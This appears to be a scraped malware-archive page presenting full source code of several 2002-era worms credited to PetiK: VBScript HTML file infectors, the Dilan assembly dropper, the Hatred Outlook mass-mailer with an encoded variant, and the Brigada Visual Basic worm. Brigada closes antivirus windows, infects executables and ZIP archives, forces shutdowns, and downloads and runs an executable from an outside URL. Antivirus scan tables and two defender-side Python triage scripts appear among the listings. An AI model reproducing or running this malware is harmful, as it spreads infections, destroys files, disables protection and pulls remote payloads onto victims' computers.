Set ht=fs.OpentextFile(P.path,8)
ht.WriteBlankLines(2)
ht.WriteLine "<SCRIPT LANGUAGE=VBScript>"
ht.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")"
ht.WriteLine "Set ws=CreateObject(""WScript.Shell"")"
ht.WriteLine f
ht.WriteLine "Infect(fso.GetSpecialFolder(0))"
ht.WriteLine "Infect(fso.GetSpecialFolder(1))"
ht.WriteLine "Infect(fso.GetSpecialFolder(2))"
ht.WriteLine "Infect(""C:\"")"
ht.WriteLine "Infect(ws.SpecialFolders(""MyDocuments""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Desktop""))"
ht.WriteLine "Infect(ws.SpecialFolders(""Favorites""))"
ht.WriteLine "Sub Infect(dir)"
ht.WriteLine "For each Q in fs.GetFolder(dir).Files"
ht.WriteLine "ext=lcase(fs.GetExtensionName(Q.Name))"
ht.WriteLine "If ext=""vbs"" Then"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,1)"
ht.WriteLine "If vb.ReadLine <> ""'VBS.Park"" Then"
ht.WriteLine "vbsorg=vb.ReadAll()"
ht.WriteLine "vb.Close"
ht.WriteLine "Set vb=fs.OpenTextFile(Q.path,2)"
ht.WriteLine "vb.WriteLine read(virhex)"
ht.WriteLine "vb.WriteLine vbsorg"
ht.WriteLine "vb.Close"
ht.WriteLine "Else"
ht.WriteLine "vb.Close"
ht.WriteLine "End If"
ht.WriteLine "End If"
ht.WriteLine "If ext=""htm"" or ext=""html"" Then"
ht.WriteLine "Set ht=fs.OpenTextFile(Q.Path,1)"
ht.WriteLine "If ht.ReadLine <> ""<vbshtmpark>"" Then"
ht.WriteLine "htmorg=ht.ReadAll()"
ht.WriteLine "ht.Close"
ht.WriteLine "Set ht=fs.CreateTextFile(Q.Path,2)"
ht.WriteLine "ht.WriteLine ""<vbshtmpark>"""
ht.WriteLine "ht.Write(htmorg)"
ht.WriteLine "ht.WriteLine document.body.CreateTextRange.htmltext"
ht.WriteLine "ht.Close"
ht.WriteLine "Else"
ht.WriteLine "ht.Close"
ht.WriteLine "End If"
ht.WriteLine "End If"
ht.WriteLine "Next"
ht.WriteLine "End Sub"
ht.WriteLine "Function read(octet)"
ht.WriteLine "For hexa=1 To Len(octet) Step 2"
ht.WriteLine "read=read & Chr(""&h"" & Mid(octet, hexa, 2))"
ht.WriteLine "Next"
ht.WriteLine "End Function"
ht.WriteLine "</SCRIPT>"
ht.Close
End If
End If
Next
End Sub
File Park.vbs received on 05.16.2009 18:00:31 (CET)
Additional information
File size: 3107 bytes
MD5...: cfa6d1d7f6e6223bfdf9ae6350cc05b0
SHA1..: 8d988bc367ce0b20adcc177f2b73764a233d77cb
comment *
Name : Worm.dilan aka adlin aka linda
Author : PetiK
Date : June 26th 2002
Language : win32asm
Spreads via an HTML file and infects other HTM/HTML files in these folders:
- WINDOWS
- WINDOWS\SYSTEM
- WINDOWS\TEMP
- DESKTOP
- MY DOCUMENTS
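Both Dilan (described here) and Haram (the s_htm block in the earlier listing) rewrite HTM/HTML files the same way: a marker line ("<dilan>" or "<haram>") is written first, the original file follows, and the dropper's own body, a single script block built around document.body.createTextRange.htmltext, is appended. The Python below is an added example written from the defender's side, not code from PetiK's archive: it classifies an HTML file by that marker line and by the VBScript constructs both droppers depend on, walks a folder for flagged files, and attempts a best-effort restore of the original content based on that layout. The sample documents are constructed; the markers and family names come from the page.

```python
"""Flag and best-effort restore HTM/HTML files rewritten by the Haram/Dilan droppers.
Sample documents below are constructed for the example."""
import re
from pathlib import Path
from typing import Dict, List, Tuple

# First-line markers taken from the page's listings, mapped to the family named in each header.
KNOWN_MARKERS = {"<haram>": "I-Worm.Haram", "<dilan>": "Worm.Dilan"}

# VBScript constructs the appended block relies on (all present in the page's dropper source).
SCRIPT_INDICATORS = {
    "fso": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "textrange": re.compile(r"document\.body\.createTextRange", re.I),
    "htmltext": re.compile(r"\.htmltext\b", re.I),
    "run_key": re.compile(r"CurrentVersion\\Run\\", re.I),
}
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def analyse_html(text: str) -> Dict[str, object]:
    """Classify one HTML document by its marker line and by script indicators."""
    first_line = text.split("\n", 1)[0].strip().lower()   # tolerates CRLF line ends
    family = KNOWN_MARKERS.get(first_line)
    indicators = [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(text)]
    # A known marker is conclusive on its own; otherwise require the self-copy pair,
    # since a legitimate page does not read its own body HTML and write it to disk.
    infected = family is not None or {"textrange", "htmltext"} <= set(indicators)
    return {"family": family, "indicators": indicators, "infected": infected}


def restore_original(text: str) -> str:
    """Best-effort recovery of the pre-infection file: drop the marker line, then remove
    the last <script> block that references createTextRange (the appended dropper body)."""
    lines = text.split("\n")
    if lines and lines[0].strip().lower() in KNOWN_MARKERS:
        lines = lines[1:]
    body = "\n".join(lines)
    for m in reversed(list(SCRIPT_BLOCK.finditer(body))):
        if SCRIPT_INDICATORS["textrange"].search(m.group(0)):
            body = body[:m.start()] + body[m.end():]
            break
    return body.rstrip("\r\n") + "\r\n"


def scan_folder(root: Path) -> List[Tuple[Path, Dict[str, object]]]:
    """Walk a folder (recursively, unlike the droppers) and return the flagged files."""
    hits = []
    for path in root.rglob("*"):
        if path.suffix.lower() in {".htm", ".html"} and path.is_file():
            result = analyse_html(path.read_text(encoding="utf-8", errors="replace"))
            if result["infected"]:
                hits.append((path, result))
    return hits


# Constructed samples: a clean page and the same page after a Haram-style rewrite.
CLEAN_HTML = "<html><head><title>Team page</title></head><body><p>Hello</p></body></html>\r\n"
DROPPER_BODY = (
    "<script language=VBScript>\r\nOn Error Resume Next\r\n"
    'Set upfkupfk=CreateObject("Scripting.FileSystemObject")\r\n'
    "Set mwrrhmwr=document.body.createTextRange\r\n"
    "rhmwrrhm.WriteLine mwrrhmwr.htmltext\r\n</script>"
)
INFECTED_HTML = "<haram>\r\n" + CLEAN_HTML + DROPPER_BODY + "\r\n"

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_HTML), ("infected", INFECTED_HTML)):
        print(label, analyse_html(doc))
    print("restored matches clean:", restore_original(INFECTED_HTML) == CLEAN_HTML)
```

The restore step only removes a script block that itself reads the body via createTextRange, so a page that legitimately carries other scripts keeps them; if the appended block was truncated mid-write, the marker line is still removed and the stray fragment is left for manual review.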
.586p
.model flat
.code
JUMPS
include useful.inc
include win32api.inc
api macro a
extrn a:proc
call a
endm
start: pushad
@SEH_SetupFrame <jmp end_worm>
get_name:
push 50
mov esi,offset orgwrm
push esi
push 0
api GetModuleFileNameA
get_copy_name:
mov edi,offset cpywrm
push edi
push 50
push edi
api GetWindowsDirectoryA
add edi,eax
mov eax,'acs\'
stosd
mov eax,'renn'
stosd
mov eax,'exe.'
stosd
pop edi
copy_worm:
push 0
push edi
push esi
api CopyFileA
push 50
push edi
push 1
@pushsz "ScanW32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
push 0
push 0
push 3
push 0
push 1
push 80000000h
push offset cpywrm
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
mov [size],eax
scan_mail:
xor edx,edx
mov edi,offset hex_f
push edi
p_c: lodsb
call conv_hex
stosw
car_s: dec size
cmp size,0
jne p_c
entr1: xor al,al
stosb
pop edi
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
push 0
push 5
push offset mydoc
push 0
api SHGetSpecialFolderPathA
@pushsz "\dilan.htm"
push offset mydoc
api lstrcat
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push offset mydoc
api CreateFileA
mov [hhtm],eax
push 0
push offset byte
push e_htm - s_htm
push offset s_htm
push [hhtm]
api WriteFile
push [hhtm]
api CloseHandle
end_worm:
@SEH_RemoveFrame
popad
push 0
api ExitProcess
conv_hex:
PUSH ECX
PUSH EDI
@@Y:
INC EDI
DEC CL
JNZ @@Y
DEC EDI
MOV AL, BYTE PTR [EDI]
POP ECX
AND CL, 0Fh
LEA EDI, Tab_Hex
INC CL
@@X:
INC EDI
DEC CL
JNZ @@X
DEC EDI
MOV AH, BYTE PTR [EDI]
POP EDI
POP ECX
RET
.data
orgwrm db 50 dup (0)
cpywrm db 50 dup (0)
mydoc db 70 dup (0)
hhtm dd ?
byte dd 0
size dd ?
Tab_Hex db "0123456789ABCDEF", 00h
s_htm: db '<dilan>',CRLF
db '<html><head><title>Only For You!</title></head><body>',CRLF
db '<script language=vbscript>',CRLF
db 'On Error Resume Next',CRLF
db 'Set fso=createobject("scripting.filesystemobject")',CRLF
db 'Set ws=createobject("wscript.shell")',CRLF
db 'If err.number=429 then',CRLF
db 'document.write "<font face size=''4'' color=black>You need ActiveX enabled to
see this file<br>'
db '<a href=''javascript:location.reload()''>Click Here</a> to reload and CLICK
YES</font>"',CRLF
db 'Else',CRLF
db 'asmhex="'
hex_f db 1024 * 13 dup (0)
db '"',CRLF
db 'read = dec(asmhex)',CRLF
db 'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)',CRLF
db 'r.Write read',CRLF
db 'r.Close',CRLF
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\scanner.exe"',CRLF,CRLF
db 'infect(fso.GetSpecialFolder(0))',CRLF
db 'infect(fso.GetSpecialFolder(1))',CRLF
db 'infect(fso.GetSpecialFolder(2))',CRLF
db 'infect(ws.SpecialFolders("MyDocuments"))',CRLF
db 'infect(ws.SpecialFolders("Desktop"))',CRLF,CRLF
db 'MsgBox "Sorry but your browser can''t read this Web file."',CRLF
db 'End If',CRLF,CRLF
db 'Function infect(dir)',CRLF
db 'If fso.FolderExists(dir) Then',CRLF
db 'For each cible in fso.GetFolder(dir).Files',CRLF
db 'ext=lcase(fso.GetExtensionName(cible.Name))',CRLF
db 'If ext="htm" or ext="html" Then',CRLF
db 'Set gd=fso.OpenTextFile(cible.path,1)',CRLF
db 'If gd.readline <> "<dilan>" Then',CRLF
db 'htmorg=gd.Readall',CRLF
db 'gd.Close',CRLF
db 'Set gd=fso.OpenTextFile(cible.path,2)',CRLF
db 'gd.WriteLine "<dilan>"',CRLF
db 'gd.Write(htmorg)',CRLF
db 'gd.WriteLine document.body.createtextrange.htmltext',CRLF
db 'gd.Close',CRLF
db 'Else',CRLF
db 'gd.Close',CRLF
db 'End If',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF,CRLF
db 'Function dec(octe)',CRLF
db 'On Error Resume Next',CRLF
db 'For hexad = 1 To Len(octe) Step 2',CRLF
db 'dec = dec & Chr("&h" & Mid(octe, hexad, 2))',CRLF
db 'Next',CRLF
db 'End Function',CRLF
db '</script></body></html>',CRLF
e_htm:
ends
end start
DILAN.HTM
<dilan>
<html><head><title>Only For You!</title></head><body>
<script language=vbscript>
On Error Resume Next
Set fso=createobject("scripting.filesystemobject")
Set ws=createobject("wscript.shell")
If err.number=429 then
document.write "<font face size='4' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and CLICK YES</font>"
Else
asmhex="4D5A50000200000004000F00FFFF..."
read = dec(asmhex)
Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)
r.Write read
r.Close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\scanner.exe"
infect(fso.GetSpecialFolder(0))
infect(fso.GetSpecialFolder(1))
infect(fso.GetSpecialFolder(2))
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))
MsgBox "Sorry but your browser can't read this Web file."
End If
Function infect(dir)
If fso.FolderExists(dir) Then
For each cible in fso.GetFolder(dir).Files
ext=lcase(fso.GetExtensionName(cible.Name))
If ext="htm" or ext="html" Then
Set gd=fso.OpenTextFile(cible.path,1)
If gd.readline <> "<dilan>" Then
htmorg=gd.Readall
gd.Close
Set gd=fso.OpenTextFile(cible.path,2)
gd.WriteLine "<dilan>"
gd.Write(htmorg)
gd.WriteLine document.body.createtextrange.htmltext
gd.Close
Else
gd.Close
End If
End If
Next
End If
End Function
Function dec(octe)
On Error Resume Next
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
</script></body></html>
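The `<dilan>` marker on the first line and the `asmhex=` blob inside the appended script are the two cheapest triage points an incident responder gets from this sample. The Python below is added here as an example and is not code from PetiK's archive: it applies the worm's own first-line test to spot an infected .htm, decodes the blob exactly as the script's `dec()` does (one byte per hex pair) so the dropped `scanner.exe` can be hashed without ever running the page, and cuts the appended dropper out so the victim's original page can be reviewed. The sample page and its 16-byte hex stub are constructed stand-ins, not the real worm body.

```python
import hashlib
import re

# Constructed stand-in for an infected page, laid out the way infect() writes it:
# the "<dilan>" marker line, the victim's original HTML, then the worm's own
# body appended. The asmhex value is a 16-byte stub, not the real worm.
SAMPLE_INFECTED_HTML = (
    "<dilan>\r\n"
    "<html><body><p>Victim page</p></body></html>\r\n"
    "<html><head><title>Only For You!</title></head><body>\r\n"
    "<script language=vbscript>\r\n"
    "On Error Resume Next\r\n"
    'asmhex="4D5A50000200000004000F00FFFF0000"\r\n'
    "read = dec(asmhex)\r\n"
    'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\\scanner.exe", 2)\r\n'
    'ws.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ScanW32",x\r\n'
    "</script></body></html>\r\n"
)

MARKER = "<dilan>"
# The generator pads hex_f with NUL bytes and writes the whole buffer, so do not
# insist on a closing quote right after the hex digits.
HEX_BLOB_RE = re.compile(r'asmhex\s*=\s*"([0-9A-Fa-f]*)')


def is_dilan_infected(text):
    """Same test the worm uses to avoid re-infecting: is the first line the marker?"""
    first_line = text.split("\n", 1)[0].rstrip("\r")
    return first_line == MARKER


def extract_dropper_payload(text):
    """Decode the asmhex blob as dec() does: each hex pair becomes one byte."""
    m = HEX_BLOB_RE.search(text)
    if m is None:
        return b""
    hexstr = m.group(1)
    if len(hexstr) % 2:  # dec() would feed a lone nibble to Chr(); drop it instead
        hexstr = hexstr[:-1]
    return bytes.fromhex(hexstr)


def triage(text):
    """Summarise the indicators an analyst would log for one file."""
    payload = extract_dropper_payload(text)
    return {
        "marker": is_dilan_infected(text),
        "dropper_script": "scanner.exe" in text and "RegWrite" in text,
        "payload_len": len(payload),
        "payload_is_pe": payload[:2] == b"MZ",
        "payload_md5": hashlib.md5(payload).hexdigest() if payload else None,
    }


def strip_dropper(text):
    """Remove the marker line and the appended VBScript dropper. IE's
    createtextrange.htmltext may have wrapped the appended part in extra
    elements, so what remains after the cut still needs a manual look."""
    if not is_dilan_infected(text):
        return text
    body = text.split("\n", 1)[1]
    blob = body.find("asmhex")
    if blob < 0:
        return body
    start = body.rfind("<script", 0, blob)
    return body[:start] if start >= 0 else body


if __name__ == "__main__":
    print(triage(SAMPLE_INFECTED_HTML))
```

Run it over every .htm/.html under the folders the script targets (the Windows, System and Temp special folders, My Documents and the Desktop); a payload whose MD5 matches a known sample hash is the confirmation, the marker alone is only the trigger for a closer look.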
File Dilan.exe received on 05.16.2009 11:30:36 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win-Trojan/Dilna.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.B2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.15 W32/Dilan.A
Avast 4.8.1335.0 2009.05.15 Win32:Petik-B
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Win32.Petik.J@mm
CAT-QuickHeal 10.00 2009.05.15 Worm.Petik.b
ClamAV 0.94.1 2009.05.15 Worm.Petik.B
Comodo 1157 2009.05.08 Worm.Win32.Petik.AD
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.20480
eSafe 7.0.17.0 2009.05.14 Win32.Petik.b
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5120.C
F-Prot 4.4.4.56 2009.05.15 W32/Dilan.A
F-Secure 8.0.14470.0 2009.05.15 Worm.Win32.Petik.b
Fortinet 3.117.0.0 2009.05.16 W32/Petik.F
GData 19 2009.05.16 Win32.Petik.J@mm
Ikarus T3.1.1.49.0 2009.05.16 Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Worm.Win32.Petik.b
Kaspersky 7.0.0.125 2009.05.16 Worm.Win32.Petik.b
McAfee 5616 2009.05.15 W32/PetTick.aj
McAfee+Artemis 5616 2009.05.15 W32/PetTick.aj
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.B2
Microsoft 1.4602 2009.05.16 Worm:Win32/Dilna.A
NOD32 4080 2009.05.15 Win32/Petik.AD
Norman 6.01.05 2009.05.16 W32/Pet_Tick.Int
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 Worm Generic
PCTools 4.4.2.0 2009.05.15 Worm.Petik
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Win32.Petik.b
Sophos 4.41.0 2009.05.16 W32/Dilna-A
Sunbelt 3.2.1858.2 2009.05.16 Worm.Win32.Petik.b
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik.b
TrendMicro 8.950.0.1092 2009.05.15 TROJ_DILNA.A
VBA32 3.12.10.5 2009.05.16 Worm.Win32.Petik.b
ViRobot 2009.5.15.1737 2009.05.15 Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petdil.A
Additional information
File size: 5120 bytes
MD5...: e56a9313f5b25300de504cdce5c84bd8
SHA1..: 6901d7cc53cc5a3223fd9efe399082b119e80cf6
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : VBS.Hatred
' Author : PetiK
' Language : VBS
' Date : 29/06/2002
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
orig=WScript.ScriptFullName
fcopy=fso.GetSpecialFolder(0) & "\LoveVSHatred.vbs"
Call Copy(orig,fcopy)
If orig=fcopy Then
list(ws.SpecialFolders("MyDocuments"))
list(fso.GetSpecialFolder(0))
Do
Set out=CreateObject("Outlook.Application")
Set map=out.GetNameSpace("MAPI")
For each c In map.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set wpalr = out.CreateItem(0)
wpalr.To = c.AddressEntries(d).Address
wpalr.Subject = "Love or Hatred"
wpalr.Body = "Open this file and choice..."
wpalr.Attachments.Add(WScript.ScriptFullName)
wpalr.DeleteAfterSubmit = True
If wpalr.To <> "" Then
wpalr.Send
End If
Next
End If
Next
Loop
End If
Sub Copy(src,dst)
fso.CopyFile orig,fcopy
ws.RegWrite "HKLM\Software\Microsoft\Windows\Currentversion\Run\LVSH",fcopy
End Sub
Sub list(dir)
For Each f1 In fso.GetFolder(dir).SubFolders
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(dir)
For Each fil In fso.GetFolder(dir).Files
ext = fso.GetExtensionName(fil.Path)
ext = lCase(ext)
If (ext = "htm") or (ext = "html") Then
Set h=fso.OpenTextFile(fil.Path,1)
scnm=h.ReadAll
h.Close
For j = 1 To Len(scnm)
If Mid(scnm, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(scnm, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(scnm, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
SendMail(mlto)
End If
Next
End If
Next
End Sub
Sub SendMail(email)
On Error Resume Next
Dim out
Set out = CreateObject("Outlook.Application")
Set mel = out.CreateItem(0)
mel.To = email
mel.Subject = "Love or Hatred ??"
mel.Body = "Open this attached file and you will know if you have the love or the hatred"
mel.Attachments.Add(WScript.ScriptFullName)
mel.Attachments.Add (WScript.ScriptFullName)
mel.Send
Set out = Nothing
End Sub
Encrypted version
Execute Q("4F6E204572726F7220526573756D65204E6...57874A456E6420537562")
Function Q(swpe)
For O=1 To Len(swpe) Step 2
Q=Q & Chr("&h" & Mid(swpe,O,2))
Next
End Function
Additional information
File size: 4043 bytes
MD5...: 0917a7ca2afb01dc26afc99f642c0b6f
SHA1..: aa809d611ba4ba26e9c4d65aeba3239888a0da79
' Name : W32.HLLW.Brigada
' Author : PetiK & alc0paul
' Language : Visual Basic
' Date : 02/07/2002
'
'
'
'
Attribute VB_Name = "Module1"
Option Explicit
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As Long, ByVal dwReserved As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const WM_CLOSE = &H10
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const EWX_SHUTDOWN = 1
Const CSIDL_PERSONAL = &H5
Const CSIDL_STARTUP = &H7
Const CSIDL_TIF = &H20
Const CSIDL_WIN = &H24
Const CSIDL_WINSYS = &H25
Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Sub Main()
On Error Resume Next
Dim vdir As String
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim hostlen As String
Dim virlen As String
Dim buffhostlen As String
Dim buffvirlen As String
Call regcall
Call killav
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe"
'--------------- check if virus or worm ------------------------
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
'worm
Call extrkzip
If InStr(1, GetCommLine, "-petikb8") = 0 Then
Else
Call wording
Call zipinfect
End If
If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then
Else
Call virustime
End If
If InStr(1, GetCommLine, "-trojanmode") = 0 Then
Else
ShutdownWindows EWX_SHUTDOWN
End If
listht GetSpecialfolder(CSIDL_TIF)
Else
'virus : execute the host
Open vdir & App.EXEName & ".exe" For Binary Access Read As #4
hostlen = (LOF(4) - 75264)
virlen = (75264) 'worm/virus + zip component
buffhostlen = Space(hostlen)
buffvirlen = Space(virlen)
Get #4, , buffvirlen
Get #4, , buffhostlen
Close #4
Open vdir & "XxX.exe" For Binary Access Write As #3
Put #3, , buffhostlen
Close #3
'borrowed from murkry's vb5 virus
idProg = Shell(vdir & "XxX.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill vdir & "XxX.exe"
End If
'-------------------------------------------------------------------
Call downloader
End Sub
'---------------------- kill avs --------------------------------------
Sub killav()
On Error Resume Next
Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12
Dim aWindow As Long
Dim angReturnValue As Long
Dim num3, arrr3, av
avn = "Pop3trap"
avn1 = "JavaScan"
avn2 = "Modem Booster"
avn3 = "vettray"
avn4 = "Timer"
avn5 = "CD-Rom Monitor"
avn6 = "F-STOPW Version 5.06c"
avn7 = "PC-cillin 2000 : Virus Alert"
avn8 = "DAPDownloadManager"
avn9 = "Real-time Scan"
avn10 = "IOMON98"
avn11 = "AVP Monitor"
avn12 = "NAI_VS_STAT"
For num3 = 0 To 12
arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12)
av = arrr3(num3)
aWindow = FindWindow(vbNullString, av)
angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull)
Next num3
End Sub
'-------------------------- download update and run it ----------------------
Sub downloader()
On Error Resume Next
Dim databyte() As Byte
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo xIt
Form1.Inet1.RequestTimeout = 40
databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray)
Open "c:\update.exe" For Binary Access Write As #2
Put #2, , databyte()
Close #2
Shell "c:\update.exe", vbHide
xIt:
End Sub
'----------------------c:\WINDOWS file infection----------------
Sub virustime()
On Error Resume Next
Dim vdir As String
Dim sfile As String
Dim a As String
Dim arr1
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim host
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe")
While sfile <> ""
a = a & sfile & "/"
sfile = dir$
Wend
arr1 = Split(a, "/")
For Each host In arr1
Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
GoTo notinfected
Else
GoTo gggoop
End If
notinfected:
infect (GetSpecialfolder(CSIDL_WIN) & "\" & host)
Exit For
gggoop:
Next host
End Sub
Function infect(hostpath As String)
On Error Resume Next
Dim ffile
Dim hostcode As String
Dim vir As String
Dim vircode As String
Dim header As String
Dim f As String
vir = App.path
If Right(vir, 1) <> "\" Then vir = vir & "\"
Open hostpath For Binary Access Read As #1
hostcode = Space(LOF(1))
Get #1, , hostcode
Close #1
Open vir & App.EXEName & ".exe" For Binary Access Read As #2
header = Space(LOF(2))
Get #2, , header
Close #2
f = "b8"
Open hostpath For Binary Access Write As #3
Put #3, , header
Put #3, , hostcode
Put #3, , f
Close #3
End Function
'--------------------zip infection-----------------------------
Sub zipinfect()
On Error Resume Next
list ("c:\")
End Sub
Sub list(dir)
On Error Resume Next
Dim fso, ssf, fil
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssf = fso.GetFolder(dir).SubFolders
For Each fil In ssf
infection (fil.path)
list (fil.path)
Next
End Sub
Sub infection(dir)
Dim fso, cf, fil, ext
Set fso = CreateObject("Scripting.FileSystemObject")
Set cf = fso.GetFolder(dir).Files
For Each fil In cf
ext = fso.GetExtensionName(fil.path)
ext = LCase(ext)
If (ext = "zip") Then
Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe", vbHide
End If
Next
End Sub
'--------------------trojan mode payload-----------------------------
Sub ShutdownWindows(ByVal intParamater As Integer)
Dim blnReturn As Boolean
blnReturn = ExitWindowsEx(intParamater, 0)
End Sub
'--------------------variable commandline-----------------------------
Sub regcall()
On Error Resume Next
Dim b As String, c As String, d As String, ws As Object
Dim regcol, final
Set ws = CreateObject("WScript.Shell")
b = "-alcopaulb8"
c = "-petikb8"
d = "-trojanmode"
regcol = Array(b, c, d)
Randomize
final = regcol(Int(Rnd * 3))
ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8", GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final
If dir("c:\regedit.exe") <> "regedit.exe" Then
FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe"
End If
End Sub
'--------------------extract zip software-----------------------------
Sub extrkzip()
On Error Resume Next
Dim vdir As String
Dim wormlen As String
Dim rarlen As String
Dim buffwormlen As String
Dim buffrarlen As String
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
wormlen = (LOF(1) - 63488)
rarlen = (63488)
buffwormlen = Space(wormlen)
buffrarlen = Space(rarlen)
Get #1, , buffwormlen
Get #1, , buffrarlen
Close #1
Open "c:\piss.exe" For Binary Access Write As #2
Put #2, , buffrarlen
